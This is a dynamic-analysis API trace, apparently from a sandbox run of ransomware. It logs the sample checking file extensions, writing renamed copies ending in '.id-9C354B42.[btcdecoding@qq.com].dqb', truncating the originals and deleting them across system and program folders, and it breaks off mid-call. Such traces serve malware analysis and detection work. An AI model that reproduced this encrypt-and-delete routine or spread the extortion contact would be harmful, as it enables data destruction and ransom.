1 [0269.268] lstrlenW (lpString=".bz2") returned 4 [0269.268] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0269.268] lstrlenW (lpString=".7z") returned 3 [0269.268] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0269.268] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0269.268] lstrlenW (lpString=".dbf") returned 4 [0269.268] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0269.268] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0269.268] lstrlenW (lpString=".1cd") returned 4 [0269.268] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0269.268] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0269.268] lstrlenW (lpString=".jpg") returned 4 [0269.268] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0269.269] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0269.269] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0269.269] lstrlenW (lpString=".doc") returned 4 [0269.269] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0269.269] lstrlenW (lpString=".docx") returned 5 [0269.269] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0269.269] lstrlenW (lpString=".pdf") returned 4 [0269.269] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0269.269] lstrlenW (lpString=".xls") returned 4 [0269.269] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0269.269] lstrlenW (lpString=".xlsx") returned 5 [0269.269] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0269.269] lstrlenW (lpString=".ppt") returned 4 [0269.269] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0269.269] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0269.269] lstrlenW (lpString=".zip") returned 4 [0269.269] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0269.269] lstrlenW (lpString=".rar") returned 4 [0269.269] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0269.269] lstrlenW (lpString=".bz2") returned 4 [0269.269] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0269.269] lstrlenW (lpString=".7z") returned 3 [0269.269] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0269.269] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0269.269] lstrlenW (lpString=".dbf") returned 4 [0269.269] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0269.269] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0269.269] lstrlenW (lpString=".1cd") returned 4 [0269.269] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0269.269] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0269.269] lstrlenW (lpString=".jpg") returned 4 [0269.269] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0269.270] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0269.270] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0269.270] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0269.270] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x310ff1c | out: lpFileSize=0x310ff1c*=90192) returned 1 [0269.270] CloseHandle (hObject=0x1f0) returned 1 [0269.270] GetFileAttributesW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui")) returned 0x20 [0269.270] GetFileAttributesW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.270] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.270] lstrlenW (lpString="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 29 [0269.270] lstrlenW (lpString="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 29 [0269.270] lstrlenW (lpString=".doc") returned 4 [0269.270] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0269.270] lstrlenW (lpString=".docx") returned 5 [0269.270] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0269.270] lstrlenW (lpString=".pdf") returned 4 [0269.270] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0269.270] lstrlenW (lpString=".xls") returned 4 [0269.270] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0269.270] lstrlenW (lpString=".xlsx") returned 5 [0269.270] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0269.270] lstrlenW (lpString=".ppt") returned 4 [0269.270] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0269.270] lstrlenW (lpString="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 29 [0269.270] lstrlenW (lpString=".zip") returned 4 [0269.271] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0269.271] lstrlenW (lpString=".rar") returned 4 [0269.271] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0269.271] lstrlenW (lpString=".bz2") returned 4 [0269.271] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0269.271] lstrlenW (lpString=".7z") returned 3 [0269.271] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0269.271] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\chs_boot.ttf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0269.369] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\cht_boot.ttf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0272.021] lstrcmpiW (lpString1=".propdesc", lpString2=".dqb") returned 1 [0272.021] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\ie8props.propdesc" (normalized: "c:\\program files\\internet explorer\\ie8props.propdesc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0272.170] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x310ff1c | out: lpFileSize=0x310ff1c*=2649) returned 1 [0272.170] CloseHandle (hObject=0x31c) returned 1 [0272.170] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\ie8props.propdesc" (normalized: "c:\\program files\\internet explorer\\ie8props.propdesc")) returned 0x20 [0272.170] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\ie8props.propdesc.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\internet explorer\\ie8props.propdesc.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.170] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\ie8props.propdesc" (normalized: "c:\\program files\\internet explorer\\ie8props.propdesc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.171] lstrcmpiW (lpString1=".exe", lpString2=".dqb") returned 1 [0272.276] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x310fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.277] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x310fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.277] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0272.304] GetLastError () returned 0x0 [0272.304] ReadFile (in: hFile=0x324, lpBuffer=0x3d20020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x310fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d20020*, lpNumberOfBytesRead=0x310fed4*=0x3a18, lpOverlapped=0x0) returned 1 [0272.316] WriteFile (in: hFile=0x328, lpBuffer=0x3d20020*, nNumberOfBytesToWrite=0x3a20, lpNumberOfBytesWritten=0x310fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d20020*, lpNumberOfBytesWritten=0x310fc9c*=0x3a20, lpOverlapped=0x0) returned 1 [0272.317] ReadFile (in: hFile=0x324, lpBuffer=0x3d20020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x310fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d20020*, lpNumberOfBytesRead=0x310fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.317] WriteFile (in: hFile=0x328, lpBuffer=0x3d20020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x310fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d20020*, lpNumberOfBytesWritten=0x310fc9c*=0xee, lpOverlapped=0x0) returned 1 [0272.317] SetEndOfFile (hFile=0x328) returned 1 [0272.317] CloseHandle (hObject=0x328) returned 1 [0272.317] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x310fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.317] SetEndOfFile (hFile=0x324) returned 1 [0272.322] CloseHandle (hObject=0x324) returned 1 [0272.322] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0272.322] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll")) returned 1 [0272.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0272.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0272.322] lstrlenW (lpString=".doc") returned 4 [0272.322] lstrcmpiW (lpString1=".doc", lpString2=".rll") returned -1 [0272.322] lstrlenW (lpString=".docx") returned 5 [0272.322] lstrcmpiW (lpString1=".docx", lpString2="0.rll") returned -1 [0272.322] lstrlenW (lpString=".pdf") returned 4 [0272.323] lstrcmpiW (lpString1=".pdf", lpString2=".rll") returned -1 [0272.323] lstrlenW (lpString=".xls") returned 4 [0272.323] lstrcmpiW (lpString1=".xls", lpString2=".rll") returned 1 [0272.323] lstrlenW (lpString=".xlsx") returned 5 [0272.323] lstrcmpiW (lpString1=".xlsx", lpString2="0.rll") returned -1 [0272.323] lstrlenW (lpString=".ppt") returned 4 [0272.323] lstrcmpiW (lpString1=".ppt", lpString2=".rll") returned -1 [0272.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0272.323] lstrlenW (lpString=".zip") returned 4 [0272.323] lstrcmpiW (lpString1=".zip", lpString2=".rll") returned 1 [0272.323] lstrlenW (lpString=".rar") returned 4 [0272.323] lstrcmpiW (lpString1=".rar", lpString2=".rll") returned -1 [0272.323] lstrlenW (lpString=".bz2") returned 4 [0272.323] lstrcmpiW (lpString1=".bz2", lpString2=".rll") returned -1 [0272.323] lstrlenW (lpString=".7z") returned 3 [0272.323] lstrcmpiW (lpString1=".7z", lpString2="rll") returned -1 [0272.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0272.323] lstrlenW (lpString=".dbf") returned 4 [0272.323] lstrcmpiW (lpString1=".dbf", lpString2=".rll") returned -1 [0272.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0272.323] lstrlenW (lpString=".1cd") returned 4 [0272.323] lstrcmpiW (lpString1=".1cd", lpString2=".rll") returned -1 [0272.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0272.323] lstrlenW (lpString=".jpg") returned 4 [0272.323] lstrcmpiW (lpString1=".jpg", lpString2=".rll") returned -1 [0272.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0272.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0272.323] lstrlenW (lpString=".doc") returned 4 [0272.323] lstrcmpiW (lpString1=".doc", lpString2=".rll") returned -1 [0272.323] lstrlenW (lpString=".docx") returned 5 [0272.323] lstrcmpiW (lpString1=".docx", lpString2="0.rll") returned -1 [0272.323] lstrlenW (lpString=".pdf") returned 4 [0272.323] lstrcmpiW (lpString1=".pdf", lpString2=".rll") returned -1 [0272.323] lstrlenW (lpString=".xls") returned 4 [0272.324] lstrcmpiW (lpString1=".xls", lpString2=".rll") returned 1 [0272.324] lstrlenW (lpString=".xlsx") returned 5 [0272.324] lstrcmpiW (lpString1=".xlsx", lpString2="0.rll") returned -1 [0272.324] lstrlenW (lpString=".ppt") returned 4 [0272.324] lstrcmpiW (lpString1=".ppt", lpString2=".rll") returned -1 [0272.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0272.324] lstrlenW (lpString=".zip") returned 4 [0272.324] lstrcmpiW (lpString1=".zip", lpString2=".rll") returned 1 [0272.324] lstrlenW (lpString=".rar") returned 4 [0272.324] lstrcmpiW (lpString1=".rar", lpString2=".rll") returned -1 [0272.324] lstrlenW (lpString=".bz2") returned 4 [0272.324] lstrcmpiW (lpString1=".bz2", lpString2=".rll") returned -1 [0272.324] lstrlenW (lpString=".7z") returned 3 [0272.324] lstrcmpiW (lpString1=".7z", lpString2="rll") returned -1 [0272.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0272.324] lstrlenW (lpString=".dbf") returned 4 [0272.324] lstrcmpiW (lpString1=".dbf", lpString2=".rll") returned -1 [0272.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0272.324] lstrlenW (lpString=".1cd") returned 4 [0272.324] lstrcmpiW (lpString1=".1cd", lpString2=".rll") returned -1 [0272.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0272.324] lstrlenW (lpString=".jpg") returned 4 [0272.324] lstrcmpiW (lpString1=".jpg", lpString2=".rll") returned -1 [0272.324] Sleep (dwMilliseconds=0x64) [0272.499] Sleep (dwMilliseconds=0x64) [0272.613] Sleep (dwMilliseconds=0x64) [0272.862] Sleep (dwMilliseconds=0x64) [0273.015] Sleep (dwMilliseconds=0x64) [0273.235] Sleep (dwMilliseconds=0x64) [0273.347] Sleep (dwMilliseconds=0x64) [0273.475] Sleep (dwMilliseconds=0x64) [0273.603] Sleep (dwMilliseconds=0x64) [0273.722] Sleep (dwMilliseconds=0x64) [0273.843] Sleep (dwMilliseconds=0x64) [0273.977] lstrcmpiW (lpString1=".MID", lpString2=".dqb") returned 1 [0273.977] lstrlenW (lpString="CMNTY_01.MID") returned 12 [0273.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d4 [0274.446] GetFileSizeEx (in: hFile=0x1d4, lpFileSize=0x310ff1c | out: lpFileSize=0x310ff1c*=6970) returned 1 [0274.446] CloseHandle (hObject=0x1d4) returned 1 [0274.446] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid")) returned 0x20 [0274.462] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0274.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0274.507] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x310fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.507] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x310fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d4 [0274.624] GetLastError () returned 0x0 [0274.624] ReadFile (in: hFile=0x328, lpBuffer=0x3d20020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x310fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d20020*, lpNumberOfBytesRead=0x310fed4*=0x1b3a, lpOverlapped=0x0) returned 1 [0274.626] WriteFile (in: hFile=0x1d4, lpBuffer=0x3d20020*, nNumberOfBytesToWrite=0x1b40, lpNumberOfBytesWritten=0x310fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d20020*, lpNumberOfBytesWritten=0x310fc9c*=0x1b40, lpOverlapped=0x0) returned 1 [0274.627] ReadFile (in: hFile=0x328, lpBuffer=0x3d20020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x310fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d20020*, lpNumberOfBytesRead=0x310fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.627] WriteFile (in: hFile=0x1d4, lpBuffer=0x3d20020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x310fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d20020*, lpNumberOfBytesWritten=0x310fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.627] SetEndOfFile (hFile=0x1d4) returned 1 [0274.627] CloseHandle (hObject=0x1d4) returned 1 [0274.627] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x310fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.627] SetEndOfFile (hFile=0x328) returned 1 [0274.630] CloseHandle (hObject=0x328) returned 1 [0274.630] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0274.666] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid")) returned 1 [0274.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0274.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0274.667] lstrlenW (lpString=".doc") returned 4 [0274.667] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0274.667] lstrlenW (lpString=".docx") returned 5 [0274.667] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0274.667] lstrlenW (lpString=".pdf") returned 4 [0274.667] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0274.667] lstrlenW (lpString=".xls") returned 4 [0274.667] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0274.667] lstrlenW (lpString=".xlsx") returned 5 [0274.667] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0274.667] lstrlenW (lpString=".ppt") returned 4 [0274.667] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0274.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0274.668] lstrlenW (lpString=".zip") returned 4 [0274.668] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0274.668] lstrlenW (lpString=".rar") returned 4 [0274.668] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0274.668] lstrlenW (lpString=".bz2") returned 4 [0274.668] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0274.668] lstrlenW (lpString=".7z") returned 3 [0274.668] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0274.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0274.668] lstrlenW (lpString=".dbf") returned 4 [0274.668] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0274.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0274.668] lstrlenW (lpString=".1cd") returned 4 [0274.668] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0274.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0274.668] lstrlenW (lpString=".jpg") returned 4 [0274.668] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0274.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0274.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0274.668] lstrlenW (lpString=".doc") returned 4 [0274.668] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0274.668] lstrlenW (lpString=".docx") returned 5 [0274.668] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0274.668] lstrlenW (lpString=".pdf") returned 4 [0274.668] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0274.668] lstrlenW (lpString=".xls") returned 4 [0274.668] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0274.668] lstrlenW (lpString=".xlsx") returned 5 [0274.668] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0274.668] lstrlenW (lpString=".ppt") returned 4 [0274.668] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0274.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0274.669] lstrlenW (lpString=".zip") returned 4 [0274.669] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0274.669] lstrlenW (lpString=".rar") returned 4 [0274.669] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0274.669] lstrlenW (lpString=".bz2") returned 4 [0274.669] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0274.669] lstrlenW (lpString=".7z") returned 3 [0274.669] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0274.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0274.669] lstrlenW (lpString=".dbf") returned 4 [0274.669] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0274.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0274.669] lstrlenW (lpString=".1cd") returned 4 [0274.669] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0274.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0274.669] lstrlenW (lpString=".jpg") returned 4 [0274.669] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0274.669] lstrcmpiW (lpString1=".MID", lpString2=".dqb") returned 1 [0274.669] lstrlenW (lpString="FALL_01.MID") returned 11 [0274.669] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0274.730] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x310ff1c | out: lpFileSize=0x310ff1c*=4846) returned 1 [0274.730] CloseHandle (hObject=0x328) returned 1 [0274.730] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid")) returned 0x20 [0274.739] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0274.739] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0274.741] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x310fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.741] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x310fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.741] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d4 [0274.742] GetLastError () returned 0x0 [0274.742] ReadFile (in: hFile=0x328, lpBuffer=0x3d20020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x310fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d20020*, lpNumberOfBytesRead=0x310fed4*=0x12ee, lpOverlapped=0x0) returned 1 [0274.744] WriteFile (in: hFile=0x1d4, lpBuffer=0x3d20020*, nNumberOfBytesToWrite=0x12f0, 